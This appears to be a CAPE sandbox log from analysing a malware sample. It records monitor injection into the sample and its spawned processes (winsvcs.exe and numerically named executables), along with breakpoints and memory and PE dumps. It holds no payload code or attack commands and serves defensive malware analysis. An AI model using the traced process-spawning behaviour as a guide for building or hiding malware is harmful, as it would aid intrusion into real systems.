Analysis

Category Package Started Completed Duration Options Log
FILE Extraction 2019-01-10 03:35:21 2019-01-10 03:39:35 254 seconds Show Options Show Log
route = internet
procdump = 0
2019-01-10 03:35:22,000 [root] INFO: Date set to: 01-10-19, time set to: 03:35:22, timeout set to: 200
2019-01-10 03:35:22,030 [root] DEBUG: Starting analyzer from: C:\ljxoi
2019-01-10 03:35:22,030 [root] DEBUG: Storing results at: C:\ckqduXtm
2019-01-10 03:35:22,030 [root] DEBUG: Pipe server name: \\.\PIPE\IFAEqB
2019-01-10 03:35:22,030 [root] INFO: Analysis package "Extraction" has been specified.
2019-01-10 03:35:23,075 [root] DEBUG: Started auxiliary module Browser
2019-01-10 03:35:23,075 [root] DEBUG: Started auxiliary module Curtain
2019-01-10 03:35:23,075 [modules.auxiliary.digisig] INFO: Skipping authenticode validation, signtool.exe was not found in bin/
2019-01-10 03:35:23,075 [root] DEBUG: Started auxiliary module DigiSig
2019-01-10 03:35:23,092 [root] DEBUG: Started auxiliary module Disguise
2019-01-10 03:35:23,092 [root] DEBUG: Started auxiliary module Human
2019-01-10 03:35:23,092 [root] DEBUG: Started auxiliary module Screenshots
2019-01-10 03:35:23,092 [root] DEBUG: Started auxiliary module Sysmon
2019-01-10 03:35:23,107 [root] DEBUG: Started auxiliary module Usage
2019-01-10 03:35:23,107 [root] INFO: Analyzer: DLL set to Extraction.dll from package modules.packages.Extraction
2019-01-10 03:35:23,107 [root] INFO: Analyzer: Package modules.packages.Extraction does not specify a DLL_64 option
2019-01-10 03:35:23,559 [lib.api.process] INFO: Successfully executed process from path "C:\Users\user\AppData\Local\Temp\4X6zg5pg.exe" with arguments "" with pid 2992
2019-01-10 03:35:23,559 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 03:35:23,559 [lib.api.process] INFO: 32-bit DLL to inject is C:\ljxoi\dll\ZjCyBoJ.dll, loader C:\ljxoi\bin\rknKhnk.exe
2019-01-10 03:35:23,917 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2992
2019-01-10 03:35:25,930 [lib.api.process] INFO: Successfully resumed process with pid 2992
2019-01-10 03:35:25,930 [root] INFO: Added new process to list with pid: 2992
2019-01-10 03:35:25,961 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x7716124a, NtSetContextThread: 0x77162840, Wow64PrepareForException: 0x73a8e290
2019-01-10 03:35:25,961 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x260000
2019-01-10 03:35:25,961 [root] DEBUG: CAPE initialised (32-bit).
2019-01-10 03:35:25,977 [root] INFO: Monitor successfully loaded in process with pid 2992.
2019-01-10 03:35:43,855 [root] DEBUG: ProtectionHandler: Address: 0x5d8b80, RegionSize: 0x292b
2019-01-10 03:35:43,855 [root] DEBUG: ProtectionHandler: Setting mid-page exec breakpoint on protection address: 0x5d8b80
2019-01-10 03:35:43,855 [root] DEBUG: SetMidPageBreakpoint: AllocationBase: 0x5d8b80, AllocationSize: 0x292b, ThreadId: 0xbb4
2019-01-10 03:35:43,855 [root] DEBUG: SetDebugRegister: Setting breakpoint 0 hThread=0xac, Size=0x0, Address=0x5d8b80 and Type=0x0.
2019-01-10 03:35:43,855 [root] DEBUG: SetBreakpoint: Set bp 0 type 0 at address 0x5d8b80, size 0 with Callback 0x74952ea0, ThreadHandle = 0xac.
2019-01-10 03:35:43,855 [root] DEBUG: SetMidPageBreakpoint: Set exec breakpoint on protected address: 0x5d8b80
2019-01-10 03:35:43,871 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x5d8b80
2019-01-10 03:35:43,871 [root] DEBUG: MidPageExecCallback: Breakpoint 0 at Address 0x5d8b80.
2019-01-10 03:35:43,871 [root] DEBUG: MidPageExecCallback: Debug: About to scan region for a PE image (base 0x5b0000, size 0x2b4ab).
2019-01-10 03:35:43,871 [root] DEBUG: DumpPEsInRange: Scanning range 0x5b0000 - 0x5db4ab.
2019-01-10 03:35:43,871 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x5b0000-0x5db4ab.
2019-01-10 03:35:43,885 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\ljxoi\CAPE\2992_8714335710412019
2019-01-10 03:35:43,885 [root] INFO: Added new CAPE file to list with path: C:\ljxoi\CAPE\2992_8714335710412019
2019-01-10 03:35:43,885 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x5d8b80 - 0x5db4ab.
2019-01-10 03:35:43,885 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoint 0 address 0x5d8b80.
2019-01-10 03:35:43,885 [root] DEBUG: MidPageExecCallback: successfully dumped memory range at 0x5b0000.
2019-01-10 03:35:43,885 [root] DEBUG: MidPageExecCallback executed successfully.
2019-01-10 03:35:43,885 [root] DEBUG: ProtectionHandler: Address: 0x400000, RegionSize: 0x8000
2019-01-10 03:35:43,885 [root] DEBUG: DumpPEsInRange: Scanning range 0x400000 - 0x408000.
2019-01-10 03:35:43,885 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x400000
2019-01-10 03:35:43,885 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-01-10 03:35:43,885 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x400000
2019-01-10 03:35:43,885 [root] DEBUG: DumpProcess: Module entry point VA is 0x407e9d
2019-01-10 03:35:43,901 [root] INFO: Added new CAPE file to list with path: C:\ljxoi\CAPE\2992_8864335710412019
2019-01-10 03:35:43,917 [root] DEBUG: DumpProcess: Module image dump success
2019-01-10 03:35:43,917 [root] DEBUG: DumpPEsInRange: Dumped PE image from 0x400000.
2019-01-10 03:35:43,917 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x400001-0x408000.
2019-01-10 03:35:43,917 [root] DEBUG: ProtectionHandler: PE image(s) detected and dumped.
2019-01-10 03:35:43,996 [root] INFO: Disabling sleep skipping.
2019-01-10 03:35:49,657 [root] INFO: Announced 32-bit process name: winsvcs.exe pid: 2912
2019-01-10 03:35:49,657 [root] INFO: Added new process to list with pid: 2912
2019-01-10 03:35:49,657 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 03:35:49,657 [lib.api.process] INFO: 32-bit DLL to inject is C:\ljxoi\dll\ZjCyBoJ.dll, loader C:\ljxoi\bin\rknKhnk.exe
2019-01-10 03:35:49,704 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2912
2019-01-10 03:35:49,736 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x7716124a, NtSetContextThread: 0x77162840, Wow64PrepareForException: 0x73a8e290
2019-01-10 03:35:49,736 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x1f0000
2019-01-10 03:35:49,736 [root] DEBUG: CAPE initialised (32-bit).
2019-01-10 03:35:49,736 [root] INFO: Disabling sleep skipping.
2019-01-10 03:35:49,752 [root] INFO: Monitor successfully loaded in process with pid 2912.
2019-01-10 03:35:50,250 [root] INFO: Notified of termination of process with pid 2992.
2019-01-10 03:35:51,280 [root] INFO: Process with pid 2992 has terminated
2019-01-10 03:36:08,410 [root] DEBUG: ProtectionHandler: Address: 0x329308, RegionSize: 0x292b
2019-01-10 03:36:08,424 [root] DEBUG: ProtectionHandler: Setting mid-page exec breakpoint on protection address: 0x329308
2019-01-10 03:36:08,456 [root] DEBUG: SetMidPageBreakpoint: AllocationBase: 0x329308, AllocationSize: 0x292b, ThreadId: 0xb50
2019-01-10 03:36:08,471 [root] DEBUG: SetDebugRegister: Setting breakpoint 0 hThread=0xac, Size=0x0, Address=0x329308 and Type=0x0.
2019-01-10 03:36:08,471 [root] DEBUG: SetBreakpoint: Set bp 0 type 0 at address 0x329308, size 0 with Callback 0x74952ea0, ThreadHandle = 0xac.
2019-01-10 03:36:08,487 [root] DEBUG: SetMidPageBreakpoint: Set exec breakpoint on protected address: 0x329308
2019-01-10 03:36:08,487 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x329308
2019-01-10 03:36:08,503 [root] DEBUG: MidPageExecCallback: Breakpoint 0 at Address 0x329308.
2019-01-10 03:36:08,519 [root] DEBUG: MidPageExecCallback: Debug: About to scan region for a PE image (base 0x300000, size 0x2bc33).
2019-01-10 03:36:08,549 [root] DEBUG: DumpPEsInRange: Scanning range 0x300000 - 0x32bc33.
2019-01-10 03:36:08,549 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x300000-0x32bc33.
2019-01-10 03:36:08,581 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\ljxoi\CAPE\2912_550836710412019
2019-01-10 03:36:08,581 [root] INFO: Added new CAPE file to list with path: C:\ljxoi\CAPE\2912_550836710412019
2019-01-10 03:36:08,581 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x329308 - 0x32bc33.
2019-01-10 03:36:08,581 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoint 0 address 0x329308.
2019-01-10 03:36:08,611 [root] DEBUG: MidPageExecCallback: successfully dumped memory range at 0x300000.
2019-01-10 03:36:08,628 [root] DEBUG: MidPageExecCallback executed successfully.
2019-01-10 03:36:08,658 [root] DEBUG: ProtectionHandler: Address: 0x400000, RegionSize: 0x8000
2019-01-10 03:36:08,658 [root] DEBUG: DumpPEsInRange: Scanning range 0x400000 - 0x408000.
2019-01-10 03:36:08,674 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x400000
2019-01-10 03:36:08,690 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-01-10 03:36:08,690 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x400000
2019-01-10 03:36:08,706 [root] DEBUG: DumpProcess: Module entry point VA is 0x407e9d
2019-01-10 03:36:08,721 [root] INFO: Added new CAPE file to list with path: C:\ljxoi\CAPE\2912_722836710412019
2019-01-10 03:36:08,721 [root] DEBUG: DumpProcess: Module image dump success
2019-01-10 03:36:08,736 [root] DEBUG: DumpPEsInRange: Dumped PE image from 0x400000.
2019-01-10 03:36:08,736 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x400001-0x408000.
2019-01-10 03:36:08,736 [root] DEBUG: ProtectionHandler: PE image(s) detected and dumped.
2019-01-10 03:36:20,967 [root] INFO: Announced 32-bit process name: 2841536727.exe pid: 2744
2019-01-10 03:36:20,967 [root] INFO: Added new process to list with pid: 2744
2019-01-10 03:36:20,967 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 03:36:20,983 [lib.api.process] INFO: 32-bit DLL to inject is C:\ljxoi\dll\ZjCyBoJ.dll, loader C:\ljxoi\bin\rknKhnk.exe
2019-01-10 03:36:20,983 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2744
2019-01-10 03:36:20,999 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x7716124a, NtSetContextThread: 0x77162840, Wow64PrepareForException: 0x73a8e290
2019-01-10 03:36:20,999 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x2e0000
2019-01-10 03:36:20,999 [root] DEBUG: CAPE initialised (32-bit).
2019-01-10 03:36:21,013 [root] INFO: Disabling sleep skipping.
2019-01-10 03:36:21,013 [root] INFO: Monitor successfully loaded in process with pid 2744.
2019-01-10 03:36:21,170 [root] DEBUG: ProtectionHandler: Address: 0x53de20, RegionSize: 0x43d1
2019-01-10 03:36:21,170 [root] DEBUG: ProtectionHandler: Setting mid-page exec breakpoint on protection address: 0x53de20
2019-01-10 03:36:21,186 [root] DEBUG: SetMidPageBreakpoint: AllocationBase: 0x53de20, AllocationSize: 0x43d1, ThreadId: 0xab4
2019-01-10 03:36:21,186 [root] DEBUG: SetDebugRegister: Setting breakpoint 0 hThread=0xac, Size=0x0, Address=0x53de20 and Type=0x0.
2019-01-10 03:36:21,201 [root] DEBUG: SetBreakpoint: Set bp 0 type 0 at address 0x53de20, size 0 with Callback 0x74952ea0, ThreadHandle = 0xac.
2019-01-10 03:36:21,217 [root] DEBUG: SetMidPageBreakpoint: Set exec breakpoint on protected address: 0x53de20
2019-01-10 03:36:21,247 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x53de20
2019-01-10 03:36:21,247 [root] DEBUG: MidPageExecCallback: Breakpoint 0 at Address 0x53de20.
2019-01-10 03:36:21,247 [root] DEBUG: MidPageExecCallback: Debug: About to scan region for a PE image (base 0x510000, size 0x321f1).
2019-01-10 03:36:21,247 [root] DEBUG: DumpPEsInRange: Scanning range 0x510000 - 0x5421f1.
2019-01-10 03:36:21,247 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x510000-0x5421f1.
2019-01-10 03:36:21,247 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\ljxoi\CAPE\2744_2482136710412019
2019-01-10 03:36:21,279 [root] INFO: Added new CAPE file to list with path: C:\ljxoi\CAPE\2744_2482136710412019
2019-01-10 03:36:21,279 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x53de20 - 0x5421f1.
2019-01-10 03:36:21,279 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoint 0 address 0x53de20.
2019-01-10 03:36:21,279 [root] DEBUG: MidPageExecCallback: successfully dumped memory range at 0x510000.
2019-01-10 03:36:21,279 [root] DEBUG: MidPageExecCallback executed successfully.
2019-01-10 03:36:21,279 [root] DEBUG: ProtectionHandler: Address: 0x400000, RegionSize: 0xd000
2019-01-10 03:36:21,279 [root] DEBUG: DumpPEsInRange: Scanning range 0x400000 - 0x40d000.
2019-01-10 03:36:21,279 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x400000
2019-01-10 03:36:21,279 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-01-10 03:36:21,295 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x400000
2019-01-10 03:36:21,295 [root] DEBUG: DumpProcess: Module entry point VA is 0x4055d7
2019-01-10 03:36:21,295 [root] INFO: Added new CAPE file to list with path: C:\ljxoi\CAPE\2744_2952136710412019
2019-01-10 03:36:21,295 [root] DEBUG: DumpProcess: Module image dump success
2019-01-10 03:36:21,311 [root] DEBUG: DumpPEsInRange: Dumped PE image from 0x400000.
2019-01-10 03:36:21,311 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x400001-0x40d000.
2019-01-10 03:36:21,311 [root] DEBUG: ProtectionHandler: PE image(s) detected and dumped.
2019-01-10 03:36:23,401 [root] INFO: Announced 32-bit process name: winsvcs.exe pid: 1340
2019-01-10 03:36:23,401 [root] INFO: Added new process to list with pid: 1340
2019-01-10 03:36:23,401 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 03:36:23,417 [lib.api.process] INFO: 32-bit DLL to inject is C:\ljxoi\dll\ZjCyBoJ.dll, loader C:\ljxoi\bin\rknKhnk.exe
2019-01-10 03:36:23,431 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1340
2019-01-10 03:36:23,447 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x7716124a, NtSetContextThread: 0x77162840, Wow64PrepareForException: 0x73a8e290
2019-01-10 03:36:23,463 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x260000
2019-01-10 03:36:23,463 [root] DEBUG: CAPE initialised (32-bit).
2019-01-10 03:36:23,479 [root] INFO: Disabling sleep skipping.
2019-01-10 03:36:23,479 [root] INFO: Monitor successfully loaded in process with pid 1340.
2019-01-10 03:36:23,619 [root] DEBUG: ProtectionHandler: Address: 0x8fe5d0, RegionSize: 0x43d1
2019-01-10 03:36:23,619 [root] DEBUG: ProtectionHandler: Setting mid-page exec breakpoint on protection address: 0x8fe5d0
2019-01-10 03:36:23,634 [root] DEBUG: SetMidPageBreakpoint: AllocationBase: 0x8fe5d0, AllocationSize: 0x43d1, ThreadId: 0x8f0
2019-01-10 03:36:23,651 [root] DEBUG: SetDebugRegister: Setting breakpoint 0 hThread=0xac, Size=0x0, Address=0x8fe5d0 and Type=0x0.
2019-01-10 03:36:23,651 [root] DEBUG: SetBreakpoint: Set bp 0 type 0 at address 0x8fe5d0, size 0 with Callback 0x74952ea0, ThreadHandle = 0xac.
2019-01-10 03:36:23,651 [root] DEBUG: SetMidPageBreakpoint: Set exec breakpoint on protected address: 0x8fe5d0
2019-01-10 03:36:23,665 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x8fe5d0
2019-01-10 03:36:23,665 [root] DEBUG: MidPageExecCallback: Breakpoint 0 at Address 0x8fe5d0.
2019-01-10 03:36:23,681 [root] DEBUG: MidPageExecCallback: Debug: About to scan region for a PE image (base 0x8d0000, size 0x329a1).
2019-01-10 03:36:23,681 [root] DEBUG: DumpPEsInRange: Scanning range 0x8d0000 - 0x9029a1.
2019-01-10 03:36:23,697 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x8d0000-0x9029a1.
2019-01-10 03:36:23,697 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\ljxoi\CAPE\1340_6982336710412019
2019-01-10 03:36:23,713 [root] INFO: Added new CAPE file to list with path: C:\ljxoi\CAPE\1340_6982336710412019
2019-01-10 03:36:23,713 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x8fe5d0 - 0x9029a1.
2019-01-10 03:36:23,713 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoint 0 address 0x8fe5d0.
2019-01-10 03:36:23,713 [root] DEBUG: MidPageExecCallback: successfully dumped memory range at 0x8d0000.
2019-01-10 03:36:23,713 [root] DEBUG: MidPageExecCallback executed successfully.
2019-01-10 03:36:23,713 [root] DEBUG: ProtectionHandler: Address: 0x400000, RegionSize: 0xd000
2019-01-10 03:36:23,713 [root] DEBUG: DumpPEsInRange: Scanning range 0x400000 - 0x40d000.
2019-01-10 03:36:23,713 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x400000
2019-01-10 03:36:23,713 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-01-10 03:36:23,713 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x400000
2019-01-10 03:36:23,729 [root] DEBUG: DumpProcess: Module entry point VA is 0x4055d7
2019-01-10 03:36:23,743 [root] INFO: Added new CAPE file to list with path: C:\ljxoi\CAPE\1340_7292336710412019
2019-01-10 03:36:23,743 [root] DEBUG: DumpProcess: Module image dump success
2019-01-10 03:36:23,743 [root] DEBUG: DumpPEsInRange: Dumped PE image from 0x400000.
2019-01-10 03:36:23,759 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x400001-0x40d000.
2019-01-10 03:36:23,759 [root] DEBUG: ProtectionHandler: PE image(s) detected and dumped.
2019-01-10 03:36:23,963 [root] INFO: Notified of termination of process with pid 2744.
2019-01-10 03:36:24,025 [root] INFO: Process with pid 2744 has terminated
2019-01-10 03:36:25,819 [root] INFO: Announced 32-bit process name: 3751939260.exe pid: 2572
2019-01-10 03:36:25,835 [root] INFO: Added new process to list with pid: 2572
2019-01-10 03:36:25,835 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 03:36:25,835 [lib.api.process] INFO: 32-bit DLL to inject is C:\ljxoi\dll\ZjCyBoJ.dll, loader C:\ljxoi\bin\rknKhnk.exe
2019-01-10 03:36:25,835 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2572
2019-01-10 03:36:25,835 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x7716124a, NtSetContextThread: 0x77162840, Wow64PrepareForException: 0x73a8e290
2019-01-10 03:36:25,835 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x260000
2019-01-10 03:36:25,849 [root] DEBUG: CAPE initialised (32-bit).
2019-01-10 03:36:25,849 [root] INFO: Disabling sleep skipping.
2019-01-10 03:36:25,849 [root] INFO: Monitor successfully loaded in process with pid 2572.
2019-01-10 03:36:30,779 [root] INFO: Announced 32-bit process name: 1495120250.exe pid: 2956
2019-01-10 03:36:30,811 [root] INFO: Added new process to list with pid: 2956
2019-01-10 03:36:30,874 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 03:36:30,967 [lib.api.process] INFO: 32-bit DLL to inject is C:\ljxoi\dll\ZjCyBoJ.dll, loader C:\ljxoi\bin\rknKhnk.exe
2019-01-10 03:36:31,029 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2956
2019-01-10 03:36:31,122 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x7716124a, NtSetContextThread: 0x77162840, Wow64PrepareForException: 0x73a8e290
2019-01-10 03:36:31,186 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x260000
2019-01-10 03:36:31,263 [root] DEBUG: CAPE initialised (32-bit).
2019-01-10 03:36:31,309 [root] INFO: Disabling sleep skipping.
2019-01-10 03:36:31,388 [root] INFO: Monitor successfully loaded in process with pid 2956.
2019-01-10 03:36:31,716 [root] DEBUG: ProtectionHandler: Address: 0x65de20, RegionSize: 0x43d1
2019-01-10 03:36:31,809 [root] DEBUG: ProtectionHandler: Setting mid-page exec breakpoint on protection address: 0x65de20
2019-01-10 03:36:31,888 [root] DEBUG: SetMidPageBreakpoint: AllocationBase: 0x65de20, AllocationSize: 0x43d1, ThreadId: 0xb88
2019-01-10 03:36:31,950 [root] DEBUG: SetDebugRegister: Setting breakpoint 0 hThread=0xac, Size=0x0, Address=0x65de20 and Type=0x0.
2019-01-10 03:36:32,028 [root] DEBUG: SetBreakpoint: Set bp 0 type 0 at address 0x65de20, size 0 with Callback 0x74952ea0, ThreadHandle = 0xac.
2019-01-10 03:36:32,121 [root] DEBUG: SetMidPageBreakpoint: Set exec breakpoint on protected address: 0x65de20
2019-01-10 03:36:32,200 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x65de20
2019-01-10 03:36:32,246 [root] DEBUG: MidPageExecCallback: Breakpoint 0 at Address 0x65de20.
2019-01-10 03:36:32,355 [root] DEBUG: MidPageExecCallback: Debug: About to scan region for a PE image (base 0x630000, size 0x321f1).
2019-01-10 03:36:32,387 [root] DEBUG: DumpPEsInRange: Scanning range 0x630000 - 0x6621f1.
2019-01-10 03:36:32,526 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x630000-0x6621f1.
2019-01-10 03:36:32,573 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\ljxoi\CAPE\2956_5583236710412019
2019-01-10 03:36:32,947 [root] INFO: Added new CAPE file to list with path: C:\ljxoi\CAPE\2956_5583236710412019
2019-01-10 03:36:33,026 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x65de20 - 0x6621f1.
2019-01-10 03:36:33,088 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoint 0 address 0x65de20.
2019-01-10 03:36:33,197 [root] DEBUG: MidPageExecCallback: successfully dumped memory range at 0x630000.
2019-01-10 03:36:33,276 [root] DEBUG: MidPageExecCallback executed successfully.
2019-01-10 03:36:33,306 [root] INFO: Announced 32-bit process name: 1865041414.exe pid: 2884
2019-01-10 03:36:33,354 [root] INFO: Added new process to list with pid: 2884
2019-01-10 03:36:33,354 [root] DEBUG: ProtectionHandler: Address: 0x400000, RegionSize: 0xd000
2019-01-10 03:36:33,431 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 03:36:33,479 [root] DEBUG: DumpPEsInRange: Scanning range 0x400000 - 0x40d000.
2019-01-10 03:36:33,540 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x400000
2019-01-10 03:36:33,588 [lib.api.process] INFO: 32-bit DLL to inject is C:\ljxoi\dll\ZjCyBoJ.dll, loader C:\ljxoi\bin\rknKhnk.exe
2019-01-10 03:36:33,650 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-01-10 03:36:33,681 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2884
2019-01-10 03:36:33,743 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x400000
2019-01-10 03:36:33,838 [root] DEBUG: DumpProcess: Module entry point VA is 0x4055d7
2019-01-10 03:36:33,852 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x7716124a, NtSetContextThread: 0x77162840, Wow64PrepareForException: 0x73a8e290
2019-01-10 03:36:33,993 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x260000
2019-01-10 03:36:34,164 [root] DEBUG: CAPE initialised (32-bit).
2019-01-10 03:36:34,305 [root] INFO: Disabling sleep skipping.
2019-01-10 03:36:34,305 [root] INFO: Added new CAPE file to list with path: C:\ljxoi\CAPE\2956_9003336710412019
2019-01-10 03:36:34,461 [root] INFO: Monitor successfully loaded in process with pid 2884.
2019-01-10 03:36:34,493 [root] DEBUG: DumpProcess: Module image dump success
2019-01-10 03:36:34,805 [root] DEBUG: DumpPEsInRange: Dumped PE image from 0x400000.
2019-01-10 03:36:34,819 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x400001-0x40d000.
2019-01-10 03:36:34,882 [root] DEBUG: ProtectionHandler: PE image(s) detected and dumped.
2019-01-10 03:36:35,911 [root] INFO: Notified of termination of process with pid 2956.
2019-01-10 03:36:36,520 [root] INFO: Process with pid 2956 has terminated
2019-01-10 03:36:36,630 [root] INFO: Announced 32-bit process name: 1717238076.exe pid: 1352
2019-01-10 03:36:36,707 [root] INFO: Added new process to list with pid: 1352
2019-01-10 03:36:36,816 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 03:36:36,941 [lib.api.process] INFO: 32-bit DLL to inject is C:\ljxoi\dll\ZjCyBoJ.dll, loader C:\ljxoi\bin\rknKhnk.exe
2019-01-10 03:36:37,066 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1352
2019-01-10 03:36:37,269 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x7716124a, NtSetContextThread: 0x77162840, Wow64PrepareForException: 0x73a8e290
2019-01-10 03:36:37,362 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x1f0000
2019-01-10 03:36:37,440 [root] DEBUG: CAPE initialised (32-bit).
2019-01-10 03:36:37,549 [root] INFO: Disabling sleep skipping.
2019-01-10 03:36:37,628 [root] INFO: Monitor successfully loaded in process with pid 1352.
2019-01-10 03:36:38,517 [root] INFO: Announced 32-bit process name: 2080821079.exe pid: 1132
2019-01-10 03:36:38,595 [root] INFO: Added new process to list with pid: 1132
2019-01-10 03:36:38,688 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 03:36:38,923 [lib.api.process] INFO: 32-bit DLL to inject is C:\ljxoi\dll\ZjCyBoJ.dll, loader C:\ljxoi\bin\rknKhnk.exe
2019-01-10 03:36:39,048 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1132
2019-01-10 03:36:39,266 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77110000, KiUserExceptionDispatcher: 0x7716124a, NtSetContextThread: 0x77162840, Wow64PrepareForException: 0x73a8e290
2019-01-10 03:36:39,421 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x260000
2019-01-10 03:36:39,578 [root] DEBUG: CAPE initialised (32-bit).
2019-01-10 03:36:39,766 [root] INFO: Disabling sleep skipping.
2019-01-10 03:36:39,921 [root] INFO: Monitor successfully loaded in process with pid 1132.
2019-01-10 03:36:40,217 [root] DEBUG: ProtectionHandler: Address: 0x64de20, RegionSize: 0x43d1
2019-01-10 03:36:40,326 [root] DEBUG: ProtectionHandler: Setting mid-page exec breakpoint on protection address: 0x64de20
2019-01-10 03:36:40,436 [root] DEBUG: SetMidPageBreakpoint: AllocationBase: 0x64de20, AllocationSize: 0x43d1, ThreadId: 0x42c
2019-01-10 03:36:40,561 [root] DEBUG: SetDebugRegister: Setting breakpoint 0 hThread=0xac, Size=0x0, Address=0x64de20 and Type=0x0.
2019-01-10 03:36:40,592 [root] DEBUG: SetBreakpoint: Set bp 0 type 0 at address 0x64de20, size 0 with Callback 0x74952ea0, ThreadHandle = 0xac.
2019-01-10 03:36:40,608 [root] DEBUG: SetMidPageBreakpoint: Set exec breakpoint on protected address: 0x64de20
2019-01-10 03:36:40,670 [root] DEBUG: Entering CAPEExceptionFilter: breakpoint hit: 0x64de20
2019-01-10 03:36:40,701 [root] DEBUG: MidPageExecCallback: Breakpoint 0 at Address 0x64de20.
2019-01-10 03:36:40,763 [root] DEBUG: MidPageExecCallback: Debug: About to scan region for a PE image (base 0x620000, size 0x321f1).
2019-01-10 03:36:40,825 [root] DEBUG: DumpPEsInRange: Scanning range 0x620000 - 0x6521f1.
2019-01-10 03:36:40,888 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x620000-0x6521f1.
2019-01-10 03:36:40,936 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\ljxoi\CAPE\1132_9204036710412019
2019-01-10 03:36:41,184 [root] INFO: Added new CAPE file to list with path: C:\ljxoi\CAPE\1132_9204036710412019
2019-01-10 03:36:41,279 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x64de20 - 0x6521f1.
2019-01-10 03:36:41,341 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoint 0 address 0x64de20.
2019-01-10 03:36:41,466 [root] DEBUG: MidPageExecCallback: successfully dumped memory range at 0x620000.
2019-01-10 03:36:41,575 [root] DEBUG: MidPageExecCallback executed successfully.
